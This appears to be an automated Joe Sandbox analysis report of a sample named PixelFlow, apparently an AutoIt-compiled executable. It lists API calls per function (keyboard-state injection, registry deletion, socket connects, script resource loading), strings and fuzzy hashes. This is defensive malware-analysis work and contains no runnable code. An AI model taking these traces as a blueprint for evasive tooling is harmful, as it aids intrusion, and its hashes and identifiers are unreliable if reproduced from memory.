PostMessageW.USER32(?,00000101,00000011,?), ref: 006616BA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00661700
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00661723

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ab2e34aa4dbc3ab8c847ccd29f2055c657ccb65b23b07933642a044dba1df7f7
Instruction ID: 909839eebb1d86a7b24735a11033e7d1abaa610e33670f474bcc40f774be1d43
Opcode Fuzzy Hash: ab2e34aa4dbc3ab8c847ccd29f2055c657ccb65b23b07933642a044dba1df7f7
Instruction Fuzzy Hash: C851A0A06047D53EFB364634CC55BF6BEAA5B07304F0C8989E1D98A9C2C2A8AD95D750

Function 006613D1 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00661410
GetKeyboardState.USER32(?), ref: 00661425
SetKeyboardState.USER32(?), ref: 00661486
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006614B2
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006614CF
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00661513
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00661534

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d1387545f6cc430591336cfcace9ea55ff3d01b2f90e4161b2cfec536c30ee35
Instruction ID: 178642122315acaad122c0cf1bb0b44971891b4b59c1311bb093007783430eab
Opcode Fuzzy Hash: d1387545f6cc430591336cfcace9ea55ff3d01b2f90e4161b2cfec536c30ee35
Instruction Fuzzy Hash: 3851F4A05442D53DFB3287348C11BB6BFEAAB47300F0C8589E1DA4F9C2D6A4EC85E761

Function 00665A25 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00665A32
_wcsncpy.LIBCMT ref: 00665A67
_wcsncpy.LIBCMT ref: 00665A99
_wcsncpy.LIBCMT ref: 00665ACC
_wcsncpy.LIBCMT ref: 00665B0E
_wcsncpy.LIBCMT ref: 00665B48
_wcsncpy.LIBCMT ref: 00665B77

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 38289eba145fe900328d25085a10ea1f881f75d47e90451516b6e8cd5ddf93ab
Instruction ID: a1ef4aab772d949765dd8612d5da50306d4b5661cee6e89f96aecf6402d6b5a1
Opcode Fuzzy Hash: 38289eba145fe900328d25085a10ea1f881f75d47e90451516b6e8cd5ddf93ab
Instruction Fuzzy Hash: 05419E75C20A2475CB51EBA49C8A9CFB3AE9F05310F10885AF519E3221EB74E315CBA9

Function 006639D1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00664A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006639F7,?), ref: 00664A4D

Part of subcall function 00664A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006639F7,?), ref: 00664A66

lstrcmpiW.KERNEL32(?,?), ref: 00663A17
_wcscmp.LIBCMT ref: 00663A33
MoveFileW.KERNEL32(?,?), ref: 00663A4B
_wcscat.LIBCMT ref: 00663A93
SHFileOperationW.SHELL32(?), ref: 00663AFF

Strings

\*.*, xrefs: 00663A8D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: f7b0ef09c60c0755b37a38623eb039ca5eeda11880ee8430d9fa6f1f1a21f5cf
Instruction ID: 5c40a8390bb5f7c0d7d4c320c4fce7240b73ad007e8ca2b8b19aa8627f395126
Opcode Fuzzy Hash: f7b0ef09c60c0755b37a38623eb039ca5eeda11880ee8430d9fa6f1f1a21f5cf
Instruction Fuzzy Hash: C0418CB1508355AEC791EF60D441AEBB7EDEF89340F00192EB48AC3251EA34D689CB5A

Function 0068767E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00687697
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0068773E
IsMenu.USER32(?), ref: 00687756
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0068779E
DrawMenuBar.USER32 ref: 006877B1

Strings

0, xrefs: 0068768B

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: bb3a704939d5f2a50c4c4557fe700ec91eb96d75ee5dc2c25a5395658176579c
Instruction ID: efd3e0ed442cc060cda9300068e09b15205f7442ad3c00770fd6d7fcfd5a8360
Opcode Fuzzy Hash: bb3a704939d5f2a50c4c4557fe700ec91eb96d75ee5dc2c25a5395658176579c
Instruction Fuzzy Hash: 97410474A04209AFDB20EF50D984EEABBBAFB04354F148269ED1597360D730ED50CFA0

Function 006813CA Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 006813F9
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00681423
FreeLibrary.KERNEL32(00000000), ref: 006814DA

Part of subcall function 006813CA: RegCloseKey.ADVAPI32(?), ref: 00681440
Part of subcall function 006813CA: FreeLibrary.KERNEL32(?), ref: 00681492
Part of subcall function 006813CA: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006814B5

RegDeleteKeyW.ADVAPI32(?,?), ref: 0068147D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: ca8feaf12e92be61f8b8f91453019c594d3787a6d32327132cb14aebbb0a1d07
Instruction ID: 0d780e4ee8dada6a17bef89bac0e8c60251f276e335cc4711b40dd5c3a11d97b
Opcode Fuzzy Hash: ca8feaf12e92be61f8b8f91453019c594d3787a6d32327132cb14aebbb0a1d07
Instruction Fuzzy Hash: 16314D71900109BFEB54EF90DC89AFEB7BDEF09344F00026AE515A6241E7709E4A9BA0

Function 006866BA Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 006866D9
GetWindowLongW.USER32(00CE55D0,000000F0), ref: 0068670C
GetWindowLongW.USER32(00CE55D0,000000F0), ref: 00686741
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00686773
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0068679D
GetWindowLongW.USER32(?,000000F0), ref: 006867AE
SetWindowLongW.USER32(?,000000F0,00000000), ref: 006867C8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 25ef9e198ab86f12ede98093d4e5d6bdd742ff8a8d2d5bae631bef45df80c046
Instruction ID: 60d9ba0a078a9af0cd4456c2084653e4b13fc765d015485d0d5cd7b93fe05480
Opcode Fuzzy Hash: 25ef9e198ab86f12ede98093d4e5d6bdd742ff8a8d2d5bae631bef45df80c046
Instruction Fuzzy Hash: D03126756041509FEB20EF18DC88FA537E6FB4A714F1912A5F6018B2B2CB71A850DB91

Function 0065E06A Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065E0AD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065E0D3
SysAllocString.OLEAUT32(00000000), ref: 0065E0D6
SysAllocString.OLEAUT32(?), ref: 0065E0F4
SysFreeString.OLEAUT32(?), ref: 0065E0FD
StringFromGUID2.OLE32(?,?,00000028), ref: 0065E122
SysAllocString.OLEAUT32(?), ref: 0065E130

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 450200914867014fac7090d3adb70982c59e13ff9da9c8732f4b9fed7c086fd7
Instruction ID: 9f928bc1a9b0f5b07b85e0661721f7e2887cb60d59e520124af49850ead4d457
Opcode Fuzzy Hash: 450200914867014fac7090d3adb70982c59e13ff9da9c8732f4b9fed7c086fd7
Instruction Fuzzy Hash: 0D21A632600619AFAF109FA8DC84CBB73EEEB08361F048125FE44DB290D6719D458760

Function 00676623 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0067823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00678268

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00676676
WSAGetLastError.WSOCK32(00000000), ref: 00676685
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006766BE
connect.WSOCK32(00000000,?,00000010), ref: 006766C7
WSAGetLastError.WSOCK32 ref: 006766D1
closesocket.WSOCK32(00000000), ref: 006766FA
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00676713

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5878d2474543ef5749f73f7047e1ba84d89850a1ebc508ff6065b6c6eecaf3fe
Instruction ID: 066b9c4b73ce97e36aeca724d3c3b863c91038ff78f1dd1b7794480a33bcc4bd
Opcode Fuzzy Hash: 5878d2474543ef5749f73f7047e1ba84d89850a1ebc508ff6065b6c6eecaf3fe
Instruction Fuzzy Hash: 9531A171600608AFEF10AF64CC89BBE77AEEF44765F008019F909972D1DB70AD448BA1

Function 0065E143 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065E188
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065E1AE
SysAllocString.OLEAUT32(00000000), ref: 0065E1B1
SysAllocString.OLEAUT32 ref: 0065E1D2
SysFreeString.OLEAUT32 ref: 0065E1DB
StringFromGUID2.OLE32(?,?,00000028), ref: 0065E1F5
SysAllocString.OLEAUT32(?), ref: 0065E203

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: befb9ef53be49065be2841e295509ed6daf9a7eddf0411d4a76aa14d97d9a4a7
Instruction ID: d3de4981265cd05e52eabfe1c7f7bd5bf0e84ba9dd1c106d6dfffb1b78640d61
Opcode Fuzzy Hash: befb9ef53be49065be2841e295509ed6daf9a7eddf0411d4a76aa14d97d9a4a7
Instruction Fuzzy Hash: 8A218832604504AFAF24DFA8DC88DAA77EEEB09761F008126FD15CB2A1D671DD458B64

Function 0065FBFC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0065FC0F
__wcsnicmp.LIBCMT ref: 0065FC30
__wcsnicmp.LIBCMT ref: 0065FC4A

Strings

#requireadmin, xrefs: 0065FC2A
#notrayicon, xrefs: 0065FC07
#OnAutoItStartRegister, xrefs: 0065FC44

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 532f7f4eb2581b82cf8a36f09cf353527696530d128b806d4603961bb60e6471
Instruction ID: 92c0c2b4c46e0362f5ebc8afd0a3f044eef661d98f9181e08b8e25d12e3e1f13
Opcode Fuzzy Hash: 532f7f4eb2581b82cf8a36f09cf353527696530d128b806d4603961bb60e6471
Instruction Fuzzy Hash: 6521673210492566D220B731AC02EFB73DBDF51342F50483AFC8187382EB91AE968398

Function 006879BA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00602111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0060214F
Part of subcall function 00602111: GetStockObject.GDI32(00000011), ref: 00602163
Part of subcall function 00602111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0060216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00687A1F
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00687A2C
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00687A37
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00687A46
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00687A52

Strings

Msctls_Progress32, xrefs: 006879F0

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: b08aacd7aed5fd356eaf0c6882e7f168d8c0e028249a7aaaf5962a26fa7f4278
Instruction ID: 212b878310062131622ee54e2fe63e3015fb9522672d67ff4c1cab9cfa21a891
Opcode Fuzzy Hash: b08aacd7aed5fd356eaf0c6882e7f168d8c0e028249a7aaaf5962a26fa7f4278
Instruction Fuzzy Hash: AF1190B2150219BEEF159F64CC85EEB7F5EEF08758F114215BB04A2190C7729C61DBA4

Function 00669D45 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00650797,?,?,00000000,00000000), ref: 00669D55
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00650797,?,?,00000000,00000000), ref: 00669D6C
LoadResource.KERNEL32(?,00000000,?,?,00650797,?,?,00000000,00000000,?,?,?,?,?,?,00614A14), ref: 00669D7C
SizeofResource.KERNEL32(?,00000000,?,?,00650797,?,?,00000000,00000000,?,?,?,?,?,?,00614A14), ref: 00669D8D
LockResource.KERNEL32(00650797,?,?,00650797,?,?,00000000,00000000,?,?,?,?,?,?,00614A14,00000000), ref: 00669D9C

Strings

SCRIPT, xrefs: 00669D62

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 424593b78a533b9a55c79da8456e6027dff47ef1206be78c891c1e16b809ebc7
Instruction ID: fbbd66d3366940d8c83cf7eceef2b05cedcc6bab61ecdeb9be0eaa4351c1e905
Opcode Fuzzy Hash: 424593b78a533b9a55c79da8456e6027dff47ef1206be78c891c1e16b809ebc7
Instruction Fuzzy Hash: A2111571200A01BFEB218B65DC48F677BBEEFC9B11F244669F905966A0DB71E800CA70

Function 00629C46 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00629C46

Part of subcall function 006232E9: EncodePointer.KERNEL32(00000000), ref: 006232EC
Part of subcall function 006232E9: __initp_misc_winsig.LIBCMT ref: 00623307
Part of subcall function 006232E9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0062A000
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0062A014
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0062A027
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0062A03A
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0062A04D
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0062A060
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0062A073
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0062A086
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0062A099
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0062A0AC
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0062A0BF
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0062A0D2
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0062A0E5
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0062A0F8
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0062A10B
Part of subcall function 006232E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0062A11E

__mtinitlocks.LIBCMT ref: 00629C4B
__mtterm.LIBCMT ref: 00629C54

Part of subcall function 00629CBC: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00629C59,00627E2D,006BB0B8,00000014), ref: 00629DB6
Part of subcall function 00629CBC: _free.LIBCMT ref: 00629DBD
Part of subcall function 00629CBC: DeleteCriticalSection.KERNEL32(0Bl,?,?,00629C59,00627E2D,006BB0B8,00000014), ref: 00629DDF

__calloc_crt.LIBCMT ref: 00629C79
__initptd.LIBCMT ref: 00629C9B
GetCurrentThreadId.KERNEL32 ref: 00629CA2

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 7169aa586866cadf22c05eedea9a5a308b1f1b7abe760f209cff3ead99d7df04
Instruction ID: 80cad01c9d899471e9d65f061481d5252b7688ce09c9fdd3cc54276bcdaa19a2
Opcode Fuzzy Hash: 7169aa586866cadf22c05eedea9a5a308b1f1b7abe760f209cff3ead99d7df04
Instruction Fuzzy Hash: 6FF0AF3260AF3119F6A47778BD0268626E39B81330F20062EF490D51E1EE1184414D78

Function 006240E9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,006241B2,?), ref: 00624103
GetProcAddress.KERNEL32(00000000), ref: 0062410A
EncodePointer.KERNEL32(00000000), ref: 00624116
DecodePointer.KERNEL32(00000001,006241B2,?), ref: 00624133

Strings

combase.dll, xrefs: 006240FE
RoInitialize, xrefs: 006240F2

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 9bba204488a55b19d7124b81c81dfa9c5d47fba9b2a444a3d532da777cbeb894
Instruction ID: e6376aa7cfc5475a6f8ee5d8b6db3c81dbe3f46d69d1d7df5a29af0291ffbb3e
